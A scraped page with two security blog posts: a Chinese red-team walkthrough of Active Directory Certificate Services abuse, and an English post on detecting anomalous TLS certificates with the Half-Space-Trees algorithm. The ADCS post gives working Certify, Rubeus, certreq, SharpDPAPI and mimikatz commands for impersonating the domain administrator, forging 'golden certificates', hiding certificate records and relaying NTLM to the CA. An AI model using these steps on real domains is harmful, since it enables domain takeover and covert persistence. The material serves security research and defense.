Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

ADCS 攻击面挖掘与利用

By: Imanfeng
7 December 2021 at 11:11

Author: Imanfeng

0x00 前言

在 BlackHat21 中 Specterops 发布了 Active Directory Certificate Services 利用白皮书,尽管 ADCS 并不是默认安装但在大型企业域中通常被广泛部署。本文结合实战讲述如何在域环境中利用 ADCS 手法拿下域控,哪些对象 ACL 可用于更好的权限维持并涉及 ADCS 的基础架构、攻击面、后利用等。

0x01 技术背景

1. 证书服务

PKI公钥基础结构

在 PKI (公钥基础结构)中,数字证书用于将公密钥对的公钥与其所有者的身份相关联。为了验证数字证书中公开的身份,所有者需要使用私钥来响应质询,只有他才能访问。

Microsoft 提供了一个完全集成到 Windows 生态系统中的公钥基础结构 (PKI) 解决方案,用于公钥加密、身份管理、证书分发、证书撤销和证书管理。启用后,会识别注册证书的用户,以便以后进行身份验证或撤销证书,即 Active Directory Certificate Services (ADCS)。

ADCS关键术语

  • 根证书颁发机构 (Root Certification Authority)
    证书基于信任链,安装的第一个证书颁发机构将是根 CA,它是我们信任链中的起始。
  • 从属 CA (Subordinate CA)
    从属 CA 是信任链中的子节点,通常比根 CA 低一级。
  • 颁发 CA (Issuing CA)
    颁发 CA 属于从属 CA,它向端点(例如用户、服务器和客户端)颁发证书,并非所有从属 CA 都需要颁发 CA。
  • 独立 CA (Standalone CA)
    通常定义是在未加入域的服务器上运行的 CA。
  • 企业 CA (Enterprise CA)
    通常定义是加入域并与 Active Directory 域服务集成的 CA。
  • 电子证书 (Digital Certificate)
    用户身份的电子证明,由 Certificate Authority 发放(通常遵循X.509标准)。
  • AIA (Authority Information Access)
    权威信息访问 (AIA) 应用于 CA 颁发的证书,用于指向此证书颁发者所在的位置引导检查该证书的吊销情况。
  • CDP (CRL Distribution Point)
    包含有关 CRL 位置的信息,例如 URL (Web Server)或 LDAP 路径 (Active Directory)。
  • CRL (Certificate Revocation List)
    CRL 是已被撤销的证书列表,客户端使用 CRL 来验证提供的证书是否有效。

ADCS服务架构

微软官方 ADCS 服务架构中的两层 PKI 环境部署结构示例如下:

ORCA1:首先使用本地管理员部署单机离线的根 CA,配置 AIA 及 CRL,导出根 CA 证书和 CRL 文件

  1. 由于根 CA 需要嵌入到所有验证证书的设备中,所以出于安全考虑,根 CA 通常与客户端之间做网络隔离或关机且不在域内,因为一旦根 CA 遭到管理员误操作或黑客攻击,需要替换所有嵌入设备中的根 CA 证书,成本极高。
  2. 为了验证由根 CA 颁发的证书,需要使 CRL 验证可用于所有端点,为此将在从属 CA (APP1) 上安装一个 Web 服务器来托管验证内容。根 CA 机器使用频率很低,仅当需要进行添加另一个从属/颁发 CA、更新 CA 或更改 CRL。

APP1:用于端点注册的从属 CA,通常完成以下关键配置

  1. 将根 CA 证书放入 Active Directory 的配置容器中,这样允许域客户端计算机自动信任根 CA 证书,不需要在组策略中分发该证书。
  2. 在离线 ORCA1上申请 APP1 的 CA 证书后,利用传输设备将根 CA 证书和 CRL文件放入 APP1 的本地存储中,使 APP1 对根 CA 证书和根 CA CRL 的迅速直接信任。
  3. 部署 Web Server 以分发证书和 CRL,设置 CDP 及 AIA。

LDAP属性

ADCS 在 LDAP 容器中进行了相关属性定义 CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=,部分前面提到过

Certificate templates

ADCS 的大部分利用面集中在证书模板中,存储为 CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC= ,其 objectClass 为 pKICertificateTemplate,以下为证书的字段

  • 常规设置:证书的有效期
  • 请求处理:证书的目的和导出私钥要求
  • 加密:要使用的加密服务提供程序 (CSP) 和最小密钥大小
  • Extensions:要包含在证书中的 X509v3 扩展列表
  • 主题名称:来自请求中用户提供的值,或来自请求证书的域主体身份
  • 发布要求:是否需要“CA证书管理员”批准才能通过证书申请
  • 安全描述符:证书模板的 ACL,包括拥有注册模板所需的扩展权限

证书模板颁发首先需要在 CA 的 certtmpl.msc 进行模板配置,随后在 certsrv.msc 进行证书模板的发布。在 Extensions 中证书模板对象的 EKU (pKIExtendedKeyUsage) 属性包含一个数组,其内容为模板中已启用的 OID (Object Identifiers)

这些自定义应用程序策略 (EKU oid) 会影响证书的用途,以下 oid 的添加才可以让证书用于 Kerberos 身份认证

描述 OID
Client Authentication 1.3.6.1.5.5.7.3.2
PKINIT Client Authentication 1.3.6.1.5.2.3.4
Smart Card Logon 1.3.6.1.4.1.311.20.2.2
Any Purpose 2.5.29.37.0
SubCA (no EKUs)

Enterprise NTAuth store

NtAuthCertificates 包含所有 CA 的证书列表,不在内的 CA 无法处理用户身份验证证书的申请

向 NTAuth 发布/添加证书:
certutil –dspublish –f IssuingCaFileName.cer NTAuthCA

要查看 NTAuth 中的所有证书:
certutil –viewstore –enterprise NTAuth

要删除 NTAuth 中的证书:
certutil –viewdelstore –enterprise NTAuth

域内机器在注册表中有一份缓存:

HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\NTAuth\Certificates

当组策略开启“自动注册证书”,等组策略更新时才会更新本地缓存。

Certification Authorities & AIA

Certification Authorities 容器对应根 CA 的证书存储。当有新的颁发 CA 安装时,它的证书则会自动放到 AIA 容器中。

来自他们容器的所有证书同样会作为组策略处理的一部分传播到每个网络连通的客户端,当同步出现问题的话 KDC 认证会抛 KDC_ERR_PADATA_TYPE_NOSUPP 报错。

Certificate Revocation List

前面在 PKI 服务架构中提到了,证书吊销列表 (CRL) 是由颁发相应证书的 CA 发布的已吊销证书列表,将证书与 CRL 进行比较是确定证书是否有效的一种方法。

CN=<CA name>,CN=<ADCS server>,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC=

通常证书由序列号标识,CRL 除了吊销证书的序列号之外还包含每个证书的吊销原因和证书被吊销的时间。

2. 证书注册

证书注册流程

ADCS 认证体系中的证书注册流程大致如下:

  1. 客户端创建公钥/私钥对;
  2. 将公钥与其他信息 (如证书的主题和证书模板名称) 一起放在证书签名请求 (CSR) 消息中,并使用私钥签署;
  3. CA 首先判断用户是否允许进行证书申请,证书模板是否存在以及判断请求内容是否符合证书模板;
  4. 通过审核后,CA 生成含有客户端公钥的证书并使用自己的私钥来签署;
  5. 签署完的证书可以进行查看并使用。

证书注册方式

1. 证书颁发机构 Web 注册

在部署 CA 时勾选证书颁发机构 Web 注册,即可在 http://CA-Computer/certsrv 身份认证后进行证书申请。

2. 客户端 GUI 注册

域内机器可以使用 certmgr.msc (用户证书),certlm.msc (计算机证书)  GUI 请求证书

3. 命令行注册

域内机器可以通过 certreq.exe 或Powershell Get-Certificate 申请证书,后面有使用示例

4. DCOM调用

基于 DCOM 的证书注册遵循 MS-WCCE 协议进行证书请求,目前大多数 C#、python、Powershell的 ADCS 利用工具都按照 WCCE 进行证书请求。

证书注册权限

在 Active Directory 中权限控制是基于访问控制模型的,其包含两个基本部分:

  • 访问令牌,其中包含有关登录用户的信息
  • 安全描述符,其中包含保护安全对象的安全信息

在 ADCS 中使用两种安全性定义注册权限 (主体可以请求证书) ,一个在证书模板 AD 对象上,另一个在企业 CA 本身上

在颁发 CA 机器上使用 certtmpl.msc 可查看所有证书模板,通过安全扩展可以对证书模板的用户访问权限查看。

可以在颁发 CA 机器上使用 certsrv.msc 查看 CA 对于用户的访问权限设置。

0x02 证书使用

1. 证书认证

Kerberos认证

Kerberos 是域环境中主要的认证协议,其认证流程大致如下:

  1. AS_REQ:client 用 client_hash 、时间戳向 KDC 进行身份验证;
  2. AS_REP:KDC 检查 client_hash 与时间戳,如果正确则返回 client 由 krbtgt 哈希加密的 TGT 票据和 PAC 等相关信息;
  3. TGS_REQ:client 向 KDC 请求 TGS 票据,出示其 TGT 票据和请求的 SPN;
  4. TGS_REP:KDC 如果识别出 SPN ,则将该服务账户的 NTLM 哈希加密生成的 ST 票据返回给 client;
  5. AP_REQ:client 使用 ST 请求对应服务,将 PAC 传递给服务进行检查。服务通过 PAC 查看用户的 SID 和用户组等并与自身的 ACL 进行对比,如果不满足则作为适当的 RPC 状态代码返回;
  6. AP_REP:服务器验证 AP-REQ,如果验证成功则发送 AP-REP,客户端和服务端通过中途生成的 Session key 等信息通过加解密转换验证对方身份。

PKINIT认证

在 RFC 4556 中定义了 PKINIT 为 Kerberos 的扩展协议,可通过 X.509 证书用来获取 Kerberos 票据 (TGT)。

PKINIT 与 Kerberos 差别主要在 AS 阶段:

  1. PKINIT AS_REQ:发d送内容包含证书,私钥进行签名。KDC 使用公钥对数字签名进行校验,确认后返回使用证书公钥加密的 TGT 并且消息是使用 KDC 私钥签名;
  2. PKINIT AS_REP:客户端使用 KDC 公钥进行签名校验,随后使用证书私钥解密成功拿到 TGT。

详细的协议流程规范:http://pike.lysator.liu.se/docs/ietf/rfc/45/rfc4556.xml

NTLM凭据

在2016年,通过证书获取 NTLM 的功能就被集成在 kekeo 和 mimikatz 中,核心在于当使用证书进行 PKCA 扩展协议认证的时候,返回的 PAC 中包含了 NTLM 票据。

即使用户密码改了,通过证书随时可以拿到 NTLM。获取能用来进行 Kerberos 身份认证的证书需要满足一下几个条件:

1. 证书模板OID

前面我们提到了,目前已知应用程序策略 (oid) 只有包含了 Client Authentication、PKINIT Client Authentication、Smart Card Logon、Any Purpose、SubCA 时,对应的证书才能充当 PKINIT 身份认证凭据。

2. 证书请求权限

  • 用户拥有向 CA 申请证书的权限;
  • 用户拥有证书模板申请证书的权限。

2. 证书获取

导出机器证书

通过 certlm.msc 图形化或 certutil.exe 进行证书导出。

当私钥设置为不允许导出的时候,利用 Mimikatz 的 crypto::capi 命令可以 patch 当前进程中的 capi ,从而利用 Crypto APIs 导出含有私钥的证书。

导出用户证书

通过 certmgr.msc 图形化或 certutil.exe 进行用户证书导出。

遇到私钥限制同样可尝试 crypto::capi 导出证书。

本地检索证书

在实战中会遇到证书、私钥文件就在文件夹内并不需要导出,其后缀文件主要有以下几种

后缀 描述
.pfx\ .p12\ .pkcs12 含公私钥,通常有密码保护
.pem 含有base64证书及私钥,可利用openssl格式转化
.key 只包含私钥
.crt\ .cer 只包含证书
.csr 证书签名请求文件,不含有公私钥
.jks\ .keystore\ .keys 可能含有 java 应用程序使用的证书和私钥

可结合自身需求通过开源工具或自研武器来满足检索文件后缀的需求。

0x03 证书滥用

本节围绕 ADCS 从证书模板的滥用到权限维持滥用进行讲解

1. 证书模板

CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 滥用

该错误配置在企业 ADCS 中是最为常见的,需满足的条件为:

  • 颁发 CA 授予低权限用户请求权限 (默认)
  • 模板中 CA 管理员审批未启用 (默认)
  • 模板中不需要授权的签名 (默认)
  • 模板允许低权限用户注册
  • 模板定义了启用认证的 EKU
  • 证书模板允许请求者在 CSR 中指定一个 subjectAltName

如果满足上列条件,当攻击者在请求证书时可通过 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 字段来声明自己的身份,从而可获取到伪造身份的证书,Certify 为白皮书配套的 ADCS 利用工具。

Certify.exe find /vulnerable

使用 certutil.exe -TCAInfo 判断 CA 状态及当前用户请求的权限情况

利用 Certify 的 set altname 来伪造 administrator 身份尝试得到证书

Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:”ESC1“ /altname:administrator

成功通过申请后可得到含有公私钥的 pem 证书文件,使用 openssl 进行格式转化

/usr/bin/openssl pkcs12 -in ~/cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out ~/cert.pfx

20.11后的 Rubeus 进行了 PKINIT 证书支持,使用 cert.pfx 作为 administrator 身份申请 TGT,成功获得 administrator 的票据

Rubeus4.exe asktgt /user:Administrator /certificate:cert.pfx /password:123456 /outfile:cert.kribi /ptt

Any EKU OR no EKU

与第一种利用需满足的条件前四点相同的用户证书非机器证书,主要差别在 EKU 的描述:

  • 颁发 CA 授予低权限用户请求权限 (默认)
  • 模板中 CA 管理员审批未启用 (默认)
  • 模板中不需要授权的签名 (默认)
  • 模板允许低权限用户注册
  • 证书模板中定义了 no EKU 或 any EKU

可使用 certutil.exe 检查模板的 pKIExtendedKeyUsage 字段是否为空

certutil -v -dstemplate

通过 Certify 成功定位到恶意模板

该利用方式并不是能直接通过 Kerberos 认证来伪造用户。Any Purpose (OID 2.5.29.37.0) 可以用于任何目的,包括客户端身份验证,如果没有指定eku,即 pkiextendedkeyusag 为空那么该证书就相当于从属 CA 的证书,可以用于任何情况给其他用户来颁发证书。

前面说过 CA 证书不在 NtAuthCertificates 内的话,是无法为身份认证作用来颁发证书的,所以该利用手段无法直接伪造用户,但可以用来签发用于其他应用,例如 ADFS ,它是 Microsoft 作为 Windows Server 的标准角色提供的一项服务,它使用现有的 Active Directory 凭据提供 Web 登录,感兴趣的可以自己搭环境试一试。

注册代理证书滥用

CA 提供一些基本的证书模板,但是标准的 CA 模板不能直接使用,必须首先复制和配置。部分企业出于便利性通过在服务器上设置可由管理员或注册代理来直接代表其他用户注册对应模板得到使用的证书。

实现该功能需要两个配置模板:

  1. 颁发“注册代理”的证书模板
  2. 满足代表其他用户进行注册的证书模板

模板一为颁发“注册代理”证书

  • 颁发 CA 授予低权限用户请求权限 (默认)
  • 模板中 CA 管理员审批未启用 (默认)
  • 模板中不需要授权的签名 (默认)
  • 模板允许低权限用户注册
  • 证书模板中定义了证书请求代理 EKU (1.3.6.1.4.1.311.20.2.1)

模板二为允许使用“注册代理”证书去代表其他用户申请身份认证证书

  • 颁发 CA 授予低权限用户请求权限 (默认)
  • 模板中 CA 管理员审批未启用 (默认)
  • 模板中不需要授权的签名 (默认)
  • 模板允许低权限用户注册
  • 模板定义了启用认证的 EKU
  • 模板模式版本1或大于2并指定应用策略,签发要求证书请求代理 EKU
  • 没有在 CA 上对登记代理进行限制 (默认)

申请注册代理证书并连同私钥导出为 esc3_1.pfx

利用 Certify 通过 esc3_1.pfx 代表 administrator 申请 esc3_2.pfx 的身份认证证书,得到的证书同样可以进行 ptt 利用

Certify.exe request /ca:"CA01.corp.qihoo.cn\corp-CA01-CA" /template:ESC3_2 /onbehalfof:administrator /enrollcert:esc3_1.pfx /enrollcertpw:123456

可看到证书颁发给了 administrator

EDITF_ATTRIBUTESUBJECTALTNAME2 滥用

一些企业因业务需求会把颁发 CA + EDITF_ATTRIBUTESUBJECTALTNAME2  来启用 SAN (主题备用名),从而允许用户在申请证书时说明自己身份。例如 CBA for Azure AD 场景中证书通过 NDES 分发到移动设备,用户需要使用 RFC 名称或主体名称作为 SAN 扩展名来声明自己的身份。

至此利用手段与第一种一样均可伪造身份,区别在于一个是证书属性,一个是证书扩展。

  • 企业CA授予低权限用户请求权限(默认)
  • 模板中CA管理员审批未启用(默认)
  • 模板中不需要授权的签名(默认)
  • CA +EDITF_ATTRIBUTESUBJECTALTNAME2

通过远程注册表判断 CA 是否开启 SAN 标识

certutil -config "CA01.corp.qihoo.cn\corp-CA01-CA" -getreg "policy\EditFlags"

手动创建利用证书请求

certreq –new usercert.inf certrequest.req

#usercert.inf
[NewRequest]

KeyLength=2048
KeySpec=1
RequestType = PKCS10
Exportable = TRUE 
ExportableEncrypted = TRUE

[RequestAttributes]
CertificateTemplate=USER

利用 req 请求上步得到 .cer 含公钥证书,其他字段可翻阅官方文档

certreq -submit -config "CA01.corp.qihoo.cn\corp-CA01-CA" -attrib "SAN:[email protected]" certrequest.req certrequest.cer

将 .cer 导入机器后连同私钥导出为 .pfx ,同样顺利通过 ptt 认证。

2. 访问权限

前面提到,证书模板和证书颁发机构是 AD 中的安全对象,这意味着安全描述符同样可用来指定哪些主体对他们具有特定的权限,详细内容可阅读 ACL 相关文档。

在对应设置中安全选项可用于对用户的权限进行相关设置,我们关注5种权限

权限 描述
Owner 对象所有人,可以编辑任何属性
Full Control 完全控制对象,可以编辑任何属性
WriteOwner 允许委托人修改对象的安全描述符的所有者部分
WriteDacl 可以修改访问控制
WriteProperty 可以编辑任何属性

模板访问权限配置错误

例如我们已经拿下整个域想借助证书模板进行权限维持,那我们可对一个无害正常模板进行相关 ACL 添加

  • NT AUTHORITY\Authenticated Users -> WriteDacl
  • NT AUTHORITY\Authenticated Users -> WriteProperty

当我们重新回到域内通过密码喷洒等手段再次拿到任意一个用户凭据后,即可将该无害模板变成我们可以利用的提权模板

  • msPKI-Certificates-Name-Flag -edit-> ENROLLEE_SUPPLIES_SUBJECT (WriteProperty)
  • msPKI-Certificate-Application-Policy -add-> 服务器身份验证 (WriteProperty)
  • mspki-enrollment-flag -edit-> AUTO_ENROLLMENT (WriteProperty)
  • Enrollment Rights -add-> Control User (WriteDacl)

随后利用恶意模板进行 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 提权利用,可拿到 administrator 的证书凭据即可 ptt ,相比 Certify ,certi 是可以在域外使用的。

PKI 访问权限配置错误

如果低特权的攻击者可以对 CN=Public Key Services,CN=Services,CN=Configuration,DC=,DC= 控制,那么攻击者就会直接控制 PKI 系统 (证书模板容器、证书颁发机构容器、NTAuthCertificates对象、注册服务容器等)。

CN=Public Key Services,CN=Services,CN=Configuration 添加 CORP\zhangsan 用户对其 GenericAll 的权限

此时我们可以滥用权限创建一个新的恶意证书模板来使用进行前面相关的域权限提升方法。

CA 访问权限配置错误

CA 本身具有一组安全权限用于权限管理

我们主要关注 ManageCAManageCertificates 两种权限

权限 描述
Read 读取 CA
ManageCA CA 管理员
Issue and manage certificates 证书管理
Request certificates 请求证书,默认拥有

利用面一:隐藏 CA 申请记录

在拿到域管权限或拥有 PKI 操作权限后创建一个恶意证书模板

使用 CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT 姿势获取到 administrator 的 pfx 证书用于权限维持 (用户状态异常无法利用该证书)

我们出于隐蔽考虑可删除模板并利用拥有 ManageCA 权限的 zhangsan 调用 COM 接口 ICertAdminD2::DeleteRow 从 CA 数据库中删除申请的证书痕迹

运维人员是无法从证书控制台观察到我们的证书申请记录并无法吊销证书。只要 administrator 用户不过期,证书不过期即可一直使用,即使用户密码更改。

利用面二:修改 CA 属性用于证书提权

当我们拥有 ManageCA 权限下调用 ICertAdminD2::SetConfigEntry 来修改 CA 的配置数据,例如Config_CA_Accept_Request_Attributes_SAN 的bool型数据从而开启 CA 的 EDITF_ATTRIBUTESUBJECTALTNAME2

此时可参考前面 EDITF_ATTRIBUTESUBJECTALTNAME2 证书提权滥用拿到域控制权

利用面三:自己审批证书注册

在证书模板设置时,部分运维会出于安全考虑将模板发布要求设置为 CA 证书管理员审批,管理员就会在 certsrv.msc 上进行确认

当拥有 ManageCertificates 权限时,可调用 ICertAdminD::ResubmitRequest 去给需要审核的滥用证书进行批准放行。

3. 其他利用

Golden Certificates

使用偷来的证书颁发机构 (CA) 证书以及私钥来为任意用户伪造证书,这些用户可以对活动目录进行身份验证,因为签署颁发证书的唯一密钥就是 CA 的私钥

当我们获取到 CA 服务器时,通过 mimikatz 或 SharpDPAPI 项目提取任何不受硬件保护的 CA 证书私钥。

SharpDPAPI4.exe certificates /machine 

使用 openssl 转化格式后,利用 ForgeCertpyForgeCert 进行证书构造,故含私钥的 CA 为“黄金证书”。

NTLM Relay to ADCS HTTP Endpoints

该利用方式是因为 http 的证书注册接口易受 NTLM Relay 攻击所导致的。NTLM 相关利用文章有很多,例如 CVE-2018-8581、CVE-2019-1040、Printerbug 等这里不再介绍。

PetitPotam 可以指定域内的一台服务器,使其对指定目标进行身份验证。当目标为低版本 (16以下) 时,可以做到匿名触发。

通过调用 MS-EFSRPC 相关函数到域控,使域控发送请求我们的监听,我们将获取到的 NTLM Relay 到 ADCS 的 Web 注册页面。

通过域控机器用户 NTLM 凭据向 web 服务注册证书,成功得到域控机器账户的Encode Base64 证书。

利用 kekeo 进行 ask tgt 成功拿到 DC$ 权限进行 Dcsync。

0x04 写在后面

ADCS 相关利用手段在实战场景中权限提升,权限维持非常便捷。针对 ADCS 的防御方案在白皮书也有详细提到,这里就不详细写了。

部分解决方案有提到微软的三层架构:

核心思想就是你是什么用户就访问怎样的资产,无法向下级访问且向上访问会告警。那么 CA 、ADCS 服务器的本地管理员组、PKI 和证书模板所拥有者都应该处于0层。

最后灵腾实验室长期招聘高级攻防专家,高级安全研究员,感兴趣可发送简历至g-linton-lab[AT]360.cn

0x05 参考链接

https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf

https://docs.microsoft.com/en-us/windows/win32/ad/how-access-control-works-in-active-directory-domain-services

https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/

https://www.anquanke.com/post/id/245791

Encryption Does Not Equal Invisibility – Detecting Anomalous TLS Certificates with the Half-Space-Trees Algorithm

7 December 2021 at 15:18

Author: Margit Hazenbroek

tl;dr

An approach to detecting suspicious TLS certificates using an incremental anomaly detection model is discussed. This model utilizes the Half-Space-Trees algorithm and provides our security operations teams (SOC) with the opportunity to detect suspicious behavior, in real-time, even when network traffic is encrypted. 

The prevalence of encrypted traffic

As a company that provides Managed Network Detection & Response services an increase in the use of encrypted traffic has been observed. This trend is broadly welcome. The use of encrypted network protocols yields improved mitigation against eavesdropping. However, in an attempt to bypass security detection that relies on deep packet inspection, it is now a standard tactic for malicious actors to abuse the privacy that encryption enables. For example, when conducting malicious activity, such as command and control of an infected device, connections to the attacker controlled external domain now commonly occur using HTTPS.

The application of a range of data science techniques is now integral to identifying malicious activity that is conducted using encrypted network protocols. This blogpost expands on one such technique, how anomalous characteristics of TLS certificates can be identified using the Half Space Trees algorithm. In combination with other modelling, like the identification of an unusual JA3 hash [i], beaconing patterns [ii] or randomly generated domains [iii], effective detection logic can be created. The research described here has subsequently been further developed and added to our commercial offering. It is actively facilitating real time detection of malicious activity.

Malicious actors abuse the trust of TLS certificates

TLS certificates are a type of digital certificate, issued by a Certificate Authority (CA) certifying that they have verified the owners of the domain name which is the subject of the certificate. TLS certificates usually contain the following information:

  • The subject domain name
  • The subject organization
  • The name of the issuing CA
  • Additional or alternative subject domain names
  • Issue date
  • Expiry date
  • The public key 
  • The digital signature by the CA [iv]. 

If malicious actors want to use TLS to ensure that they appear as legitimate traffic they have to obtain a TLS certificate (Mitre, T1608.003) [v]. Malicious actors can obtain certificates in different ways, most commonly by: 

  • Obtaining free certificates from a CA. CA’s like Let’s Encrypt issue free certificates. Malicious actors are known to widely abuse this trust relationship (vi, vii). 
  • Creating self-signed certificates. Self-signed certificates are not signed by a CA. Certain attack frameworks such as Cobalt Strike offer the option to generate self-signed certificates.
  • Buying or stealing certificates from a CA. Malicious actors can deceive a CA to issue a certificate for a fake organization.

The following example shows the subject name and issue name of a TLS certificate in a recent Ryuk ransomware campaign.

Subject Name: 
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com

Issuer Name: 
C=US, ST=TX, L=Texas, O=lol, OU=, CN=idrivedownload[.]com 

Example 1. Subject and issuer fields in a TLS certificate used in Ryuk ransomware

The meaning of the attributes that can be found in the issuer name and subject name fields of TLS certificates are defined in RFC 5280 and are explained in the table below.

Attribute
C Country of the entity
S State of province
L Locality
O Organizational name
OU Organizational Unit
CN Common Name
Table 1.  The subject usually includes the information of the owner, and the issuer field includes the entity that has signed and issued the certificate (RFC, 5280) (viii).

Note the following characteristics that can be observed in this malicious certificate:

  • It is a self-signed certificate as no CA present in the Issuer Name. 
  • The Organization names attribute contains the string “lol” 
  • The Organizational Units attribute is empty 
  • A domain name is present in the Common Name (ix, x)

Compare these characteristics to the legitimate certificate used by the fox-it.com domain. 

Subject Name:
C=GB, L=Manchester, O=NCC Group PLC, CN=www.nccgroup.com

Issuer Name:
C=US, O=Entrust, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K

Example 2. Subject and issuer fields in a TLS certificate used by fox-it.com

Observe the attributes in the Subject and Issuer Name. In the Subject Name is information about the owner of the certificate. In the Issuer Name is information of the CA. 

Using machine learning to identify anomalous certificates

When comparing the legitimate and malicious certificate the certificate used in Ryuk ransomware “looks weird”. If humans could identify that the malicious certificate is peculiar, could machines also learn to classify such a certificate as anomalous? To explore this question a dataset of “known good” and “known bad” TLS certificates was curated. Using white-box algorithms, such as Random Forest, several features were identified that helped classify malicious certificates. For example, the number of empty attributes had a statistical relationship with how likely it was used for malicious activities.However, it was soon recognized that such an approach was problematic, there was a risk of “over-fitting” the algorithm to the training data, a situation whereby the algorithm would perform well on the training dataset but perform poorly when applied to real life data. Especially in a stream of data that evolves over time, such as network data, it is challenging to maintain high detection precision. To be effective this model needed the ability to become aware of new patterns that may present themselves outside of the small sample of training data provide; an unsupervised machine learning model which could detect anomalies in real-time was required.  

An isolation-based anomaly detection approach

The Isolation Forest was the first isolation-based anomaly detection model, created by Liu et al. in 2008 (xi). The referenced paper presented an intuitive but powerful idea. Anomalous data points are rare. And a property of rarity is that the anomalous data point must be easier to isolate from the rest of the data. 

From this insight the algorithm proposed computes the ease of isolating an anomaly. It achieves this by making a tree to split the data (visualization 1 includes an example of a tree structure). The more anomalous an observation is the faster an anomaly gets isolated in the tree, and the less splits in the tree are needed. Note, the Isolation Forest is an ensemble method, meaning it builds multiple trees (forest) and calculates the average amounts of splits made by the trees to isolate an anomaly (xi). 

An advantage of this approach is that, in contrast to density and distance-based approaches, less computational cost is required to identify anomalies (xi, xii) whilst maintaining comparable levels of performance metrics (viii, ix).

Half-Space-Trees: Isolation-based approach for streaming data 

In 2011, building on their earlier work, Tan and Liu created an isolation-based algorithm called Half-Space-Trees (HST) that utilized incremental learning techniques. HST enables an isolation-based anomaly detection approach to be applied to a stream of continuous data (xiii). The animation below demonstrates how a simple half-space-tree isolates anomalies in the window space with a tree-based structure: 

Visualization 1:  An example of 2-dimensional data in a window divided by two simple half-space-trees, the visualization is inspired by the original paper.

The HST is also an ensemble method, meaning it builds multiple half-space-trees. A single half-space-tree bisects the window (space) in half-spaces based on the features in the data. Every single half-space-tree does this randomly and goes on as long as the set height of the tree. The half-space-tree calculates the amount of data points per subspace and gives a mass score to that subspace (which is represented by the colors). 

The subspaces where most datapoints fall in are considered high-mass subspaces, and the subspaces with low or no data points are considered low-mass subspaces. Most data points are expected to fall in high-mass subspaces because they need many more splits (i.e., a higher tree) to be isolated. The sum of the mass of all half-space-trees becomes the final anomaly score of the HST (xiii). Calculating mass is a different approach than looking at the number of splits (as conducted in the Isolation Forest). Even so, using recursive methods calculating the mass profile is maintained as a simple and fast way of computing data points in streaming data (xiii). 

Moreover, the HST works with two consecutive windows; the reference window and the latest window. The HST learns the mass profile in the reference window and uses it as a reference for new incoming data in the latest window. Without going too deep into the workings of the windows, it is worth mentioning that the reference window is updated every time the latest window is full. Namely, when the latest window is full, it will override the mass profile to the reference window and the latest window is cleared so new data can come in. By updating its windows in this way, the HST is robust for evolving streaming data (xiii). 

The anomaly scores output issued by HSTs falls between 0 and 1. The closer the anomaly score is to 1 the easier it was to isolate the certificate and the more likely that the certificate is anomalous. Testing HSTs on our initial collated data it was satisfied that this was a robust approach to the problem, with the Ryuk ransomware certificate repeatedly identified with an anomaly score of 0.84.

The importance of feedback loops – going from research to production

As a provider of managed cyber security services, we are fortunate to have a number of close customers who were willing to deploy the model in a controlled setting on live network traffic. In conjunction with quick feedback from human analysts on the anomaly scores that were being outputted it was possible to optimize the model to ensure that it produced sensible scoring across a wide range of environments. Having achieved credibility, the model could be more widely deployed. In an example of the economic concept of “network effects” the more environments on which the model was deployed, the more model performance has improved and proved itself adaptable to the unique environment in which it is operating. 

Whilst high anomaly scores do not necessarily indicate malicious behavior, they are a measure of weirdness or novelty. Combining the anomaly scoring obtained from HSTs with other metrics or rules, derived in real-time, it has become possible to classify malicious activity with greater certainty.

Machines can learn to detect suspicious TLS certificates 

An unsupervised, incremental anomaly detection model is applied in our security operations centers and now part of our commercial offerings. We would like to encourage other cyber security defenders to look at the characteristics of TLS certificates to detect malicious activities even when traffic is encrypted. Encryption does not equal invisibility and there is often (meta)data to consider. Accordingly so, it requires different approaches to search for malicious activity. Particularly as a Data Science team we found that the Half-Space-Trees is an effective and quick anomaly detector in streaming network data. 

References 

[i] NCC Group & Fox-IT. (2021). “Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes.”
https://research.nccgroup.com/2021/06/14/incremental-machine-leaning-by-example-detecting-suspicious-activity-with-zeek-data-streams-river-and-ja3-hashes/

[ii] Van Luijk, R. (2020) “Hunting for beacons.” Fox-IT.

[iii] Van Luijk, R., Postma, A. (2019). “Using Anomaly Detecting to Find Malicious Domains” Fox-It < https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/ >

[iv] https://protonmail.com/blog/tls-ssl-certificate/

[v] https://attack.mitre.org/techniques/T1608/003/

[vi] Mokbel, M. (2021). “The State of SSL/TLS Certificate Usage in Malware C&C Communications.” Trend Micro.
https://www.trendmicro.com/en_us/research/21/i/analyzing-ssl-tls-certificates-used-by-malware.html

[vii] https://sslbl.abuse.ch/statistics/

[viii] Cooper, D., Santesson, S., Farrell, S., Boeyen, S., Housley, R., and W. Polk. (2008). “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile”, RFC 5280, DOI 10.17487/RFC5280.
https://datatracker.ietf.org/doc/html/rfc5280

[ix] https://attack.mitre.org/software/S0446/

[x] Goody, K., Kennelly, J., Shilko, J. Elovitz, S., Bienstock, D. (2020). “Kegtap and SingleMalt with Ransomware Chaser.” FireEye.
https://www.fireeye.com/blog/jp-threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

[xi] Liu, F. T. , Ting, K. M. & Zhou, Z. (2008). “Isolation Forest”. Eighth IEEE International Conference on Data Mining, pp. 413-422, doi: 10.1109/ICDM.2008.17.
https://ieeexplore.ieee.org/document/4781136

